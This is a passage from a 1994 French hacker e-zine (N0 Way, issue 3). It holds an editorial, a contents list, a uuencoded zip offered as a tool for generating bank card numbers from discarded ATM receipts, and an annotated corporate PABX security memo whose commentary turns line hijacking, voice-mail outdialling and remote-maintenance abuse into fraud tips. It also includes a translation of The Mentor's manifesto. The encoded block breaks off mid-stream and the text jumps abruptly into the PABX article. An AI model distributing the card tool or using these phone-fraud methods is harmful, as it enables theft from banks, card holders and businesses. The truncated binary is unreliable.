-%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.1 26 Septembre 1994 \-------------------/ > N0 WAY III < /-------------------\ Ce matin, j'‚coute la radio: "Une famille alg‚rienne va ˆtre expuls‚e. Le village o— ils habitent se mobilise contre cet avis d'expulsion..." et le pr‚fet raconte des conneries sur la situation d‚plorable que devait avoir cette famille en France sans travail stable et sans s‚curit‚ sociale. Mais bien sur, dans son mental de politique verreux, il ne pensera jamais … leur bonne int‚gration et aux problŠmes qu'ils affronteront en Alg‚rie. Il ne pensera pas non plus au FIS qui s'attaquera a eux. Je ferme la radio, d‚gout‚ ET LA, ca change: non, je ne me dis pas "Qu'est ce que je peux y faire, je suis isol‚" Je ne me morfond pas en disant: "On peut rien faire contre ces pourris". Si, on peut faire quelque chose et N0 Way 3 est l… pour se battre … sa maniŠre contre toutes ces pourritures. Maintenant, BASTA... Les hackers&phone phreaks sont l… ! N0 Way est l… ! Alors dans cette issue sortie en quatrieme vitesse, j'espere que vous trouverez votre bonheur. Ca bouge un peu partout en france, on entre dans l'hiver et pourtant on sort de l'hibernation. A Toulouse des assos se sont mont‚es pour faire bouger le monde de la rave, a Paris c'est une complete effervescence. Chaque jour, je voie avec plaisir un nouvel "apprenti sorcier" des r‚seaux me poser des question sur: "Comment on hacke?" "Comment on devient root sur Unix?" "Comment on seize un trunk au Japon?" Et les villes suivent: intiative techno & squatts … Lyon, bars & magasins technos et cyberpunk … Montpellier, raves underground … Lille, d‚veloppeur de virus informatiques … Rouen, boite HardCore … Tours etc... Des initiatives jeunes se montent de plus en plus souvent dans notre soci‚t‚ g‚rontocratique: Bars technos, Concerts grunge (… prendre au sens r‚el du mot), Teknivals (ou teknivaux? :), Bar Cyberpunk, accŠs Internet pas cher, home studio d'enfer... Aux USA il y a d‚ja les Cypherpunks qui ont fait vraiment du boulot, l'EFF s'est battu comme un diable contre le Clipper Chip mena‡ant la vie priv‚e de chacun. Matt Blaze a montr‚ que le SkipJack (impl‚mentation de ce que l'on appelle le Clipper Chip) ‚tait facilement "manoeuvrable". R‚sultat: le gouvernement retire le Clipper Chip. La mˆme bataille reste … mener en France. En Europe, des choses trŠs graves se passent sans qu'on en entende tellement parler. En france, les "pirates informatiques" sont montr‚s du doigt comme de petits vandales informatiques, Satan‚s gosses, tous les mˆmes. Alors, lisez N0 Way, et R‚AgIsSeZ !!!! Faites comme tous les cyberpunks de France: bougez vous et devenez actif dans le combat contre cet establishment qui nous ‚touffe. Dans ce num‚ro nous vous proposons un superbe article de notre ami Arscene sur la dissimulation de fichiers, un fichier r‚pandu mais d'une qualit‚ extraordinaire sur l'ins‚curit‚ d'Unix par Dan Farmer et Wietse Venema, le manifeste g‚nial de "The Mentor" traduit pour la premiŠre fois en Francais et plein d'autres superbes articles "mortels"... Vous pourrez vous "fendre la gueule(tm)" avec un article en particulier. Arrested Developpment, official distributor in Nederland (NL): +31 77 547 477 The One propage -- N0 Way -- en France et en Europe: +33 49 88 76 91 (BBS) +33 48 70 10 29 (Minitel) +33 48 58 46 17 (Minitel) Vous pouvez me joindre: ~~~~~~~~~~~~~~~~~~~~~~ Sur RTC 0NE ! |\ Sur 3615 TALK | > Bal: NeurAlien Sur The 0ne ! |/ Sur Internet !!!! Email: an133729@anon.penet.fi (signez vos messages avec votre Email). >>>>>>>>>>>>>>> TOUT ARTICLE ACCEPTE *<<<<<<<<<<<<<<< "This is the network of the life" --Corona. ++NeurAlien. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Disclaimer: Cette publication ‚lectronique peut contenir des informations, donn‚es et articles interdits dans certains pays. Si les informations de cette publication sont interdites dans un pays, il est du devoir du lecteur de v‚rifier qu'il a bien le droit de poss‚der et de lire (ahahahaha :-) cette publication. Les auteurs et ‚diteurs ne sont en aucun cas responsables d'une mauvaise utilisation des informations publi‚es. Pour les attaques en diffamation et autres conneries bonne pour les censeurs, allez voir qui vous croyez ˆtre l'‚diteur.... Pour la simple et bonne raison que de responsable de la publication et d'‚diteur il n'y en a pas!!! Les informations fournies dans cette publication sont … titre informatifs uniquement. Nous ne vous garantissons rien et si ca vous plait pas allez lire autre chose! Hahahahahahahahahaha... Toutefois, la diffusion et la lecture de ce bulletin PRIVE est restreinte … toutes les personnes dans l'underground informatique. Ne font pas partie de l'underground informatique tel que je le concoit les personnes suivantes: Membres d'‚quipes de s‚curit‚ publiques ou priv‚s, personnes affili‚es … des agences gouvernementales, informateurs quelconques, responsables s‚curit‚s et autres empaff‚s se croyant sup‚rieur de par leur titre. Lire ce bulletin en n'‚tant pas dans l'underground informatique constitue donc une violation des lois de Copyright et de Propri‚t‚ Intellectuelle ainsi qu'un acte de malveillance envers les auteurs et les r‚dacteurs car cela revient … lire des informations propri‚taires. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= AprŠs ‡a, c'est pas la DST qui peut nous faire un procŠs pour N0 WAY... "Quoi? Vous avez lu de la documentation propri‚taire et secrŠte alors que vous faites partie d'une agence de s‚curit‚????" -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.2 Table des matiŠres: ~~~~~~~~~~~~~~~~~~ # Titre Auteur Taille 3.1 : Introduction N0 Way Team 6 Ko 3.2 : Table des matiŠres N0 Way Team 2 Ko 3.3 : Trash & Carte Bleues Field 9 Ko 3.4 : Piratage des PABX -- Premier Acte. *Operator TDF* 17 Ko 3.5 : La conscience d'un Hacker The Mentor 4 Ko 3.6 : Data dissimulation techniques Arscene 20 Ko 3.7 : Playing hide 'n' seek in CyberSpace NeurAlien 21 Ko 3.8 : Cartes T‚l‚phoniques -- Premier Acte. D. O'Connell 9 Ko 3.9 : L'Underground Francais sous developpe? * NeurAlien 16 Ko 3.10: L'art du Social Engineering NeurAlien 7 Ko 3.11: "Breaking Into Your Site" D. Farmer & W. Venema 53 Ko 3.12: Plaisanter sous Unix NeurAlien 10 Ko 3.13: Du cot‚ d'Internet NeurAlien 19 Ko 3.14: L'explosif? Tient tient... Inlandsis 7 Ko 3.15: Prime & The PrimeOS environment * NeurAlien 6 Ko 3.16: Rave Revolt NeurAlien 4 Ko 3.17: Multics * NeurAlien 7 Ko 3.18: Tel - Trixx NeurAlien 6 Ko Nota: une ‚toile (*) aprŠs le nom de l'article veut dire que cet article a ‚t‚ fait pour CORE DUMP et ressort pour N0 WAY. -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.3 >--------------< > TrAsH &&& C.B. < >--------------< Le fichier suivant est … uudecoder. Si vous savez pas faire c'est vraiment que vous avez autre chose … apprendre que la contrefacon de num‚ro de cartes bancaires. Ce petit utilitaire a ‚t‚ ‚crit pour ST (GFA basic) par FIELD. Il permet de g‚n‚rer des num‚ros de carte bleue … partir des bouts de papier trouv‚s dans les poubelles des distributeurs automatiques. Vous pouvez contacter Field sur The 0ne. +33 1 48 70 10 29 alors, revetez votre cyber-combinaison, prenez votre portable et votre radio- modem 28800 bauds puis rendez vous … l'ATM le plus proche pour une autre session de d‚lire avec N0 Way... ++NeurAlien. ----------------------------------CUT HERE----------------------------------- section 1 of uuencode 3.07 of file cb_nums.zip by R.E.M. begin 644 cb_nums.zip M4$L#!!0``@`(`&1F)QWUW^]R`04``(X+```+````0T)?3E5-4RY'1D&M5LUO; M&T44GQW;&W^LG<3Y:H*3C*VH::,VV$DV:1!2V8UWBHMC1W9:A%0)F62K&KEV' M\4=4]51%XMX#!X[\$1QZ[*DJ$D*FYW9612X0Y6;JE(M'&PCZZ>/D'`5L'D)M/V(O$0H^CO@3X1BKQ&2DH#Y( M2T#U(_&$0RS=.]0JY/T@P"PYII7R!1K1J52EL9K/94%Y3(8,6#CXN:!4A)VRA,/H;A2DRE M[81IKYA6#+ZE%.V&7O5OY%O-IOZ,-'1RTCK5"?PU:N2+6O.KGDZND1UR\JC^S M\&%;[Y#KY(.T@2G:@"PRR&KV'I^W6SQO?Q`+D2)%5W&QGZKH)X_T-H#4SO03` MR.@,PC(\:A,?';Z!_;J1_N]@BD1OYEC=P@]08YJQ&]V]9)6V^V'I\3?2AA, M:WV3HE3H>3]R4FMW]'UH"O2%C((NDE-6W<_ MM@M@DV`W?D7?F2^*(*8ZNB+L(.&V@=,_\+F$M#E"KYP/N#SV\$&7#WCXD,L'# M75Z"&<.R`:[E1V0CX/A1V0@Z?DPV0MSG.N';ACBJGHC+>^N)NKRWGIC+!SV\[ MY/(A#Q]W>='#)UQ^PL-/NGS8PT^Y?,2S#@G9"#O]3LI&Q/&G9"/J^-.R$7/\B MI&Q(CC\C&W''GY6-A.//R<:DX\_+QA3W^9X0^)EQ]P3_C^\!!'M@%NPB"T]<0 M/+=V`1PD-,_/S-T\6YR\#.XK3/[7: M"IR.=7L5!V<=TR?F>BVP!=%^+H%W])WU7$H_LH69P3.8<6\&GA%G\1$9KUE\D M*./4O5-XAL0D3X;Y3$JOF#3#-IP[>Q=NS?GB>JM]6F_6NGJO3;XFW7:K=W;.V MFT*9_K3]+=&!*[-1/X4K\%^KR#N-FO>\U>E@]+[IIBFU[)7A.%KY:KMYOB M]1KZLYMGK5Z'])KPD=&S+F;GH^-:^?W2=9(VDM3JN:P:R??@(T$P38O:MZQAO M[:YRA2:1*/PU5`N?/8B^_P=02P,$%`````@`X'OU'!=FX(YY`@``\P8```L`( M``!214%$7TU%+D=30U/`#FX=(0CV\W)A5Z>P62%:V]@X5E?#4%/7Q-+"0M?<2 MS-)0(2"Q*+-8WZTH,2\Y%:@$AX&;%4Z>I0[8K;`98N`NA5MP?]VY<^?^_?M`M M4@&/$!9%"@K[@>;`#82!V_?!)$CI_=MP(3U4(9`B/51%$``U$`F`I/44[MR_? M#01WP#P(@2($Q+^01'BY[@-MN`V"0./OW84:=/OVIMNW[X*X0/P+50BB"$@BA M%$$-!ID!=--M!8B!+H'%P0,@XN&^!&*04$ MZ!60T`]4(84[4/?=AXN09!QV&X`8IW'W;X-C'=EGMS$]"Q4"I30P0"BZ#XG,U M^U@BXP=A`Y%"#ZX(;@*2@7=0DLMM1$KXB6K@O=N0P$-6=.D:%"<$%B439(N-C`($\A.3\W,R]=83-:X7D3+1I`X,`1$@#(@`!G?8\`% M$PM]QQ)@6:WOD9B7YJ7\"DY-+LDOL M4C#(2]5W+2S-S,NOT'?U-M!W*RTJR2Q+U8>X*"C86=\OM5PA.+&DM"A/(=PCF M\)=S?EY)47Z.0DAJ8JZ^8U%V1F*N@AM0/""C"&@E4#^0\,M7"$^L5$C)+"Y1\ M*,XL2?V%\)^BP@<_@P\*08XAG@80IHNCIT^D@H^GKV<(1"`@R#/,T3D2PG%T? M"@WV#'-5<'/T=E50Y.4"`%!+`P04````"`"2H@(=BOTJL54"``#Y!0``#```C M`%)%041?1$E3+E546%,`@0T;-^$"&S<`Y>^`52GHX5?(RP4S[/9],+BM`)9!J M\("&Z8'5_$15B`K`"I$,4[A]7V'#!IAA\^./B18PI54 M/7H$*&P$`5B(0GC(+D.+S=MP%;@-0P5($0"*`07B#<.2=K!%`$(*B4(S[#Y6@ M`/?F?4@,(`Q#J,!B&.Z$#8U(HG.`PBV%(Q0"A?U0LS8#<>@OA?>_%%Q^*3SY. MI1#T2\$=3!K\0H@#00A85N,7B&$`%E\+Y@:#9#?#'':`E MDW*%D"]/\EP4\NTUB]=' MP>"+^[+W:X.7A:PUR-,#&C0W/U0]1<%GK7>JPB$#A:0G"LO>*X2&P+4HK%`P6 M*`(I*E)XF._XQ44AU[%2X>$[D)*4M<4A7]8FA1[RS'^O4+RVY(G""K##(.H5$ MLD*+0Q3*'?-"%(H-_R),@]R!](*X0\T0@Q>+_6.5C!,??)E[7)CGD*[ MX4#E5@I!3QX^\5'P>;(V.#3HB8*VH;Z%@:&N8["WKLG:$$7\)CTI#`6YI;G]NZ-D5-4TO>UKYL;JS'0T5%Y MDR]]6?%":GQMJ;.>F"(USENZH[GQKM;=3RF]=K.9QVUE27`8M6H\97A'P;IV. MZ0=;*ZKUM7$%[EU5>S=I:MMX69FX+,.F:'MK>VMD4T>V0H!ED5)F\)DVN2UJV M4[NRH&G32^=CXU;>K?B<&N!G`^,1'5X)"X?1/U]?1'3F;`$+CJ,'86A9+\&$' M&<(Z<]62L.O;\]/AF:E<2O]ASHK*BB$G5LV7J3/86-M*B+@829ZP+@:F\25(- M,$W:%.QCDOV2,V\9QVBF#;,(^(O3]Z/3-\CV[]AE&YH.7#$K?2X95BL.OT;3> MR?86X!%_,:6BS"<`Q>*+TS/:Z9L@C+ID3`Y];;V+PMR4386<(04"DI9(7[IBR MBOU<23!?E4JRU35S8UP-:[^LG5\2E])UO'3B83?O7I]1V5!:YO/:1C3JK[$HK M>)W+RQM*T`T_\ZR!LFJN;6WSN>3:TQ=B;^8E,K]#Z)8563O+EFLOM MHS-J:B>UG)?"95<@UCM2B'!K/\%19D\(*6R$/]+HCIX^.:*#PX>/Z.AOCY_0. M\=/#`\C#?H$KZPWG=$(/'_%6[)2-G&8O6A&S:3XA+W.C[><+9U'759IP#BXXL M2>F^T':0R7<#X\!Z;OS'9@GY0I%3QE`Q=TW%]9>2UE;@*XZ512WMAXJ`PV+PI M7PA>Y:DI`YW[`I+KBBS_3&T.<=G/7"1N/0IS(E58@00-0)]P5P&Z:F8S)U-EP M)L."!3RWM>,V014F-N,WO88=LO6-Q"H]:S4%J1@@T9VFJN`2XJB<=H#[C$RM7 MCHEW%K9,PAWE9=%K:,2B4VYSPK%8I&MU3-C^N$/-;]#2S%F*_E7<;&/(L9!K, M,=8Q@5L1,%>JT2Z>^U\J.CX(P!&]SI1-H08JF6*=K4OM9EF#O\*F-0+DKG\[B M^N$MEPJ(:%[/1#6I4J*4,6,BZ$D9*L@MD#N6CH0%U>9BLZ^O\!P`FL5]U167H7)-662_!<],+RVV5!*P\WF6>(BIDD8V M^5-1HZ\8B`>93>45"H_PF6D]L124MS:B3--4F`^"`B5!UEZZ%,?+U4JXJ8Q>S MH=U5?%[HK*RDI=@W7H'-JN%5B!H?&,N3I12<>>YKBM,IK*@03F6^`:O)2R=%V MV9Q36C2QWD%9W:LEDUG MPKO+T?"'[U]VOT,0Y:Z`?49'Q\,G!\/#@^'#I\138F*R\)O.]M8EY&BE($SC> MG1SL4RA_[I?I$IKEDA52/EGZV`SN,,RXS3A4GN8I$IHQKH[(U%1=]5BI.#HP; M\SP/%9[IE9ED[(E/X>TMG/$#/70Z"JW,ROZY+L6@KUW#9T-Z@1+-7"8,5G9*5 M];5O>($-]XCB7YE$]+M7O-X4L>.XE1C&4EXEO:ER>YY5W\3SMH!^L`<"6=[V`LS@90;;<<]T*.@UD27H['+2ZV3 MVEV%F224C,=Q,):]+2),QNL(^1.>$UKP,S8LU#P.(`OQU"8!L7\M:!RWH5RWX M8AL+7,Q_NOLUSP(2WW:/"K5(-.68@XHYV`YPC\!&JYRTBH?`^95P+RA)*S=)^ M>%3@!=]%RO.NIAP%L@`GCD)&XUW>V:ZH3/1OLGJ\[2J4:)WE/@XIQQTC0IQ$K MJ-ERT'M*9;R)R!:W?0J3/IYDW++A0IG9462%C=>W29>EL-HQR>%A^T+A]L+F? M7?T(BDG&.VNTE:@6BIUH#(N.WUB(7P7'*.,.[#9DC?L!*$Q6R8B9PB?CF%9NF M-0:`19UWYFM'_F@B(M6D72E5-L:B`7E\UE69QKH6`HLT-+9J^2G1#A[2\`'^& MALIIZ61CI!"J@R1P\6`]=D)OM2$I#;D-XN=.ZV_\53WC(&`=$FP\Z&^):#U'N M,`6HOPZCL[/WNIS$7YB$>QM/@TW8:.W@-Q>FV[._]MK>>H]?RDI/!X6-7WXH1 MX_/SR_@E3I6B_!2?-_C*<6/C4__AVN3TTZL?:?B_(7WS7#Y&.,=\F=&EQ=JY6 MMT5Z3:]^O"_"Y_3J`H<;_53Z;$KXZFGIFWLBY`.#Z")^%9_&HWW8'QWOT[G)W M<)#NT_O+?3K-W979Y^^G/QMO/^_3M2OJ:I]&UX8_^-S*2WR_(-(SYGY:GM,[& M5USA.^?/=')/?*L(_X6Z/L+/OR'8'3I$TQ[AU^HA'>/G"3X?X^E03K]#^K:DH M@_B-/%S@?QHJJ/`0(``/,&```+````````````(````"H%``!214%$7TU%= M+D=30U!+`0(:!10````(`)*B`AV*_2JQ50(``/D%```,````````````(```' M`,P'``!214%$7T1)4RY55%A02P$"&@44````"`#H92<=:TQK`&8'```J$0``\ M"P```````````"````!+"@``0T)?3E5-4RY$3T-02P4&``````0`!`#E````D MVA$``+,!1&EZ('=A"]%2T\O1G5R=&EV92]&1E0O< M07)K:&%M+TI&1B!72%$@N@T*NE1H92#;LB#;LB#;LB#;LB#;V]NR($)"4[JZ/ M("%&=6-K(2]#;VYT2!D:7-T9 M('-I=&4@N@T*NB`@("#;LB#;LB#;LB#;LB#;LB`@("`@(+JZ(%!#+T%T87)II M+TA0-#@O4$A!0R]-:7-C96QL86YY("T@2G5S="!K97=L('=A>> EVITER DE FAIRE CONTROLER SON SYSTEME PAR SON INSTALLATEUR OU CONSTRUCTEUR DANS UN PREMIER TEMPS. C) prise de conscience a) demande d'info: - autres entreprise - presse sp‚cialis‚e b) declenchement d'une mission interne preliminaire: 1) constitution d'un groupe de travail. 2) definir les objectifs 3) definir un planning 4) rechercher un cabinet independant disposant d'experts en la matiere. 5) presentation du probleme. 6) Etablir un contrat definissant la mission du cabinet. 7) signature du contrat. c) declenchement d'un audit. 1) def.o de la mission 2) planif.o " " 3) analyse physique de l'existant 4) analyse des risques financiers 5) analyse du systŠme 6) definition des controles … mettre en oeuvre 7) definition des tests … r‚aliser 8) mise en oeuvre de 6 et 7 [ OUARF... TROP UTILE LA 8) !!! ;) ] 9) [yen a pas!!!! bin alors ?? ;) ] 10) Consignation des r‚sultats 11) les recommandations … mettre en oeuvre 12) SynthŠse ‚conomique et technique sur les risques et les moyens compl‚mentaires de protection … mettre en oeuvre. d) action: mise en place des solution d'urgence pr‚conis‚es. 2ø) [ c'est chiant je passe] r‚sum‚: voir si ya pas un employ‚ qu'est parti … la concurrence. 3ø) les types de pirate: A) detournement d'une ligne pour t‚l‚phoner [ ouais !!!!! Beige Box rules ] B) detournement d'une ligne pour appeler des serveurs Nitel [ kewl ! ] C) ecoute des communications [ c'est vous qui le dite ;) ] D) Le pirate informatique, vol d'information [ bande de paranos, on en a rien a foutre de votre bilan commercial cumul‚ sur l'effectif diff‚r‚ r‚troactif.... tout ce qu'on veut c'est VOTRE SYSTEME !! ;) ] E) Le sabotage des systŠmes [ ya que les burnes qui font ca ! ] F) Le pirate sportif [ ouais !!!!! ca c'est kewl ! ] A) detournement d'une ligne pour t‚l‚phoner [ ouais !!!!! Beige Box rules ] Objectif: telephoner gratuitement … cout moindre [ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ] [ mais il ‚tait raide bourr‚ le mec qui a ] [ ‚crit cela !!!! hahaha... je suis pete de rire ] Ce detournement peut etre volontaire: [ plutot oui! ] - programmation volontaire sur un poste ou dans le pabx. - appel d'un auxiliaire du PABX, messagerie vocale par exemple, pour ressortir vers l'exterieur. Pour un appel vers l'etranger, le pirate sera tax‚ de son domicile au PABX pirat‚. Ce dernier sera tax‚ pour la ligne ‚tablie jusqu'… l'‚tranger. ou involontaire: [ on y croit ! ] mauvaise affectation des taxes sur les postes. - lors de l'utilisation de la fonction conference - transfert - renvoi B) Detournement pour appeler des serveurs minitel: le detournement dans ce cas est generalement volontaire [ ouahahahaha ] La m‚thode consiste … appeler le PABX d'une soci‚t‚: - obtenir une ligne sur le PABX - surnum‚roter cette ligne - ressortir vers l'exterieur. - obtenir la liaison avec un serveur. C) Ecoute teleph [ c'est chiant, je tape pas ces conneries ! ] D) Le pirate informatique, vol d'information PIRATE ===> PABX soci‚t‚ A || || \/ Central FT ville 1 =====> Central FT Ville 2 || || \/ Site informatique pirat‚. [ comme ca la trace est remont‚e plus difficilement ] E) Le sabotage des systŠmes [ PFFFF..... ] F) Le pirate sportif [ La le mec sait ce qu'il dit ! ] Objectif du pirate: l'argent n'est pas la motivation principale, du moins au d‚part. buts: * se connecter … un max de systŠme * penetrer par jeu * s'introduire au coeur meme du systŠme par d‚fi methode utilis‚ee: * recherche des num‚ros d'appel * recherche de mot de passe * contourner les protections * acceder aux fonctions interdites Son but n'est pas de casser. Il peut seulement souhaiter utiliser des heures machines ou des donn‚es. Peu dangereux, il peut le devenir si: [ jamais vu cela ! ] - il donne ses infos … des tiers sans scrupules - des soci‚t‚ concurrentes - il est recrut‚ pour l'argent 4ø) A) Piratage physique des lignes analogiques FT Central FT || -------------------- || \/ Soci‚t‚ PABX || \/ -------------------- repartiteur dans la cabine PABX. * || Immeuble de la soci‚t‚ || \/ repartiteur g‚n‚ral * $ || || \/ sous repartit d'‚tage * $ || || \/ poste tel . * $ [ une * == point de piratage physique possible en analogique ] [ un $ == point de piratage physique possible en num‚rique ] Piratage physique des lignes. a) methode simple et a peu de frais. Possibilit‚ de se connecter sur tous les points du cheminement de la sortie du central au point final d'implantation du poste. b) Dans le cas d'un raccordement num‚rique du PABX, il ne sera pas possible de se raccorder sur le cheminement du central … la soci‚t‚. Un piratage de ce type necessite un equipement d'un cout tres dissuasif. La partie sensible se situe donc entre le PABX et la prise murale ou est connect‚ le poste analogique. Le pirratage ne pourra etre fait qu'a L'INTERIEUR de l'immeuble. c) Dans le cas d'une liaison num‚rique de bout en bout, le piratage … peu de frais deviens impossible [Ah ouais? t'veux une contre preuve?] B) Piratage des fonctionnalit‚s du PABX Nous avons ici deux types de piratage possible: * volontaire avec les fonctionnalit‚s disponible dans le PABX. * involontaire : affectation des taxes a un autre poste que le sien sans l'avoir voulu. Il s'agit le plus souvent de mauvais parametrage lors de la programmation ou des erreurs dans le logiciel lors de sa conception. Exemple concret li‚ … un bug: si l'initiateur d'unee conference avec deux correspondant exterieurs raccroche en premier, question: - est ce que les deux autres personnes seront coup‚es - Si la r‚ponse est non qui sera taxe? Idem dans le cas d'un appel transf‚r‚ vers l'exterieur. Les fonctionnalit‚s concern‚es sont: * conference: verifier si les corresp. st coup‚s qd l'initiateur raccroche * transfert : lors des transferts interne, verifier si la repartition des taxes s'effectue correctement. * renvoi: avec un MIC T2 grand confort, il est possible de renvoyer les communication vers l'exterieur. * recuperation des fonctionnalit‚ d'un poste de direction par un code et son mot de passe. Cette fonction permet a partir de n'importe quel poste de la soci‚t‚ de r‚cup‚rer le 19 en affectant le ticket de taxation au poste directeur. C) Piratage par telemaintenance. [ce qui suit est ma description des schemas: Fonction de t‚l‚maintenance: * Controle de qualit‚ d'une ligne : permet d'appeler n'importe quel num‚ro. * Programmation d'un poste fantome puis renvoi. ] a) il est possible d'appeler un PABX et de se faire rappeler simultanement. Le but est de contr“ler l'‚tablissement de la liaison et de mesurer sa qualit‚: - en affaiblissement - en paradiaphonie - en reverberation Au lieu de se faire rappeler sur le site de contr“le, un technicien peut en profiter pour appeler un correspondant … l'‚tranger ou des serveurs minitel. Les taxes seront donc affect‚ au site control‚! b) Il est possible par telemaintenance de d‚clarer par programmation un poste dit fantome dans un PABX distant. Il existe dans la machine mais il n'est physiquement pas pr‚sent sur le site. D) Piratage d'un auxiliaire d'un PABX. Ce type de piratage est possible par le biais des options install‚es sur un autocommutateur t‚l‚phonique. Sont concern‚s: * serveurs vocaux * messageries vocales * les op‚rateurs automatiques Moyen de protection: Sur incident, appel non abouti il est souhaitable de r‚orienter les appels vers la standardiste. Cette pr‚caution empˆche un correspondant exterieur de surnum‚roter pour rappeler un autre poste … travers le PABX. E) Piratage par une base TSF. [ bof, je tape pas ca: On passe dans les couloirs de la soci‚t‚ avec un t‚l‚phone sans fil et on essaye d'accrocher une base ! ] 5ø) A) acces aux locaux: [ resum‚: - salle PABX ferm‚e - acces control‚s - que des techniciens habilit‚s. - mm ch pr la salle d'exploit. - gaines techniques fermees - cabine de sous repartition control‚e et surveill‚e - chemins de cable visibles cercl‚s et couverts! B) protec des infos. Enferm‚ dans des armoires: - derniere programmation - support annuaire technique - la composition des tetes PTT - la composition du systeme ne doit pas etre divulgu‚ surtout si des auxiliaires sont raccord‚s derriere le PABX. Attention: Les microordinateurs envoy‚s en r‚paration, peuvent contenir des informations sensibles: - annuaire technique complet - annuaire extern - liste des num‚ros abr‚g‚s - liste des techniciens habilit‚s. - liste des mots de passe - la taxation contenant tous les num‚ros appel‚s. C) Destruction des supports obsolete: [ en bref, on passe tout au broyeur et DELETE et FORMAT ne sont pas effectifs ! ] D) Sauvegarde 6ø) Les moyens de contr“le: A) La taxation telephonique: [ sch‚ma montrant une imprimante connect‚e au modem de maintenance du PABX avec consoles d'observ du trafic, de taxation et console systeme PABX ainsi qu'une messagerie vocale. ] Doit permettre un controle sur une periode param‚trable pour les appels ‚mis par poste, service, direction. * a l'etranger * en province * en local B) Observ. du trafic: permet de reperer les lignes modem du PABX appel‚es en dehors des heures ouvrables. [ ***CONCLUSION*** ***IMPORTANTE*** DONC : SCANNEZ LA NUIT MAIS ------> *** UTILISEZ LE JOUR *** ] Tres utile en cas de piratage du PABX pour determiner les faisceaux utilis‚s pour entrer et ressortir a travers le PABX et ses auxiliaires. Afin de faciliter ce rep‚rage, il est possible d'extraire les appels ressortantss dans la meme minute que les appels quii arrivent sur le PABX. Cette possibilit‚ facilite grandement l'analyse si des temporisations n'ont pas ‚t‚ program‚es. Les tickets des appels ‚mis par un PABX et non compris par le PC d'observation de trafic doivent etre stock‚s pour traitement ult‚rieur. Ne pas oublier que la puissance de traitement d'un systeme p‚riph‚rique de taxation ou d'observation t‚l‚phonique est li‚e … la richesse des informations d‚livr‚es par le PABX d'un constructeur. Exemple: si le PABX n'a que des compteurs pour les emissions et les receptions d'appels, il sera impossible de faire un horodatage et de determiner les heures de pointes. -- Fin de la premiŠre partie -- -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.5 \/\La Conscience d'un hacker/\/ par +++The Mentor+++ Ecrit le 8 Janvier 1986 Traduit par NeurAlien le 8 septembre 1994. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Un autre s'est fait prendre aujourd'hui, c'est partout dans les journaux. "Scandale: Un adolescent arret‚ pour crime informatique", "Arrestation d'un 'hacker' aprŠs le piratage d'une banque"... Satan‚s gosses, tous les mˆmes. Mais avez vous, dans votre psychologie en trois piece et votre profil technocratique de 1950, un jour pens‚ … regarder le monde derriere les yeux d'un hacker? Ne vous etes vous jamais demand‚ ce qui l'avait fait agir, quelles forces l'avaient model‚? Je suis un hacker, entrez dans mon monde... Le mien est un monde qui commence avec l'‚cole... Je suis plus astucieux que la pluspart des autres enfants, les conneries qu'ils m'apprennent me lassent... Je suis au collŠge ou au lyc‚e. J'ai ‚cout‚ les professeurs expliquer pour la quizieme fois comment r‚duire une fraction. Je l'ai compris. "Non Mme Dubois, je ne peux pas montrer mon travail. Je l'ai fait dans ma tˆte" Satan‚ gosses. Il l'a certainnement copi‚. Tous les mˆmes. J'ai fait une d‚couverte aujourd'hui. J'ai trouv‚ un ordinateur. Attends une minute, c'est cool. Ca fait ce que je veux. Si ca fait une erreur, c'est parce que je me suis plant‚. Pas parce qu'il ne m'aime pas... Ni parce qu'il se sent menac‚ par moi... Ni parce qu'il pense que je suis petit filoux... Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas ˆtre l…... Satan‚s gosses. Tout ce qu'il fait c'est jouer. Tous les mˆmes. Et alors c'est arriv‚... une porte s'est ouverte sur le monde... Se pr‚cipitant a travers la ligne t‚l‚phonique comme de l'h‚roine dans les veines d'un accro, une impulsion electronique est envoy‚e, on recherche un refuge … l'incompetence quotidienne... un serveur est trouv‚. Vous vous repetez que nous sommes tous pareils... On a ‚t‚ nourri … la petite cuillere de bouffe pour b‚b‚ … l'‚cole quand on avait faim d'un steak... Les fragments de viande que l'on nous a laiss‚ ‚taient pr‚-mach‚s et sans gout. On a ‚t‚ domin‚ par des sadiques ou ignor‚ par des apathiques. Les seuls qui avaient des choses … nous apprendre trouvŠrent des ‚lŠves volontaires, mais ceux ci sont comme des gouttes dans le desert. C'est notre monde maintenant... Le monde de l'‚l‚ctron et de l'interrupteur, la beaut‚ du baud. Nous utilisons un service d‚ja existant, sans payer ce qui pourrait ˆtre bon march‚ si ce n'‚tait pas la propri‚t‚ de gloutons profiteurs, et vous nous appelez criminels. Nous explorons... et vous nous appelez criminels. Nous recherchons la connaissance... et vous nous appelez criminels. Nous existons sans couleur de peau, sans nationalit‚, sans dogme religieux... et vous nous appelez criminels. Vous construisez des bombes atomiques, vous financez les guerres, vous ne punissez pas les patrons de la mafia aux riches avocats, vous assassinez et trichez, vous manipulez et nous mentez en essayant de nous faire croire que c'est pour notre propre bien ˆtre, et nous sommes encore des criminels. Oui, je suis un criminel. Mon crime est celui de la curiosit‚. Mon crime est celui de juger les gens par ce qu'ils pensent et dise, pas selon leur apparence. Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez jamais. Je suis un hacker, et ceci est mon manifeste. Vous pouvez arreter cet individu, mais vous ne pouvez pas tous nous arreter... aprŠs tout, nous sommes tous les mˆmes. +++The Mentor+++ -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.6 ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º Data dissimulation techniques: º º ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ º º Hiding your data in º º a Restricted and Patrolled º º District of CyberSpace. º º ------------------------------ º º Written by Arscene º º for N0Way º 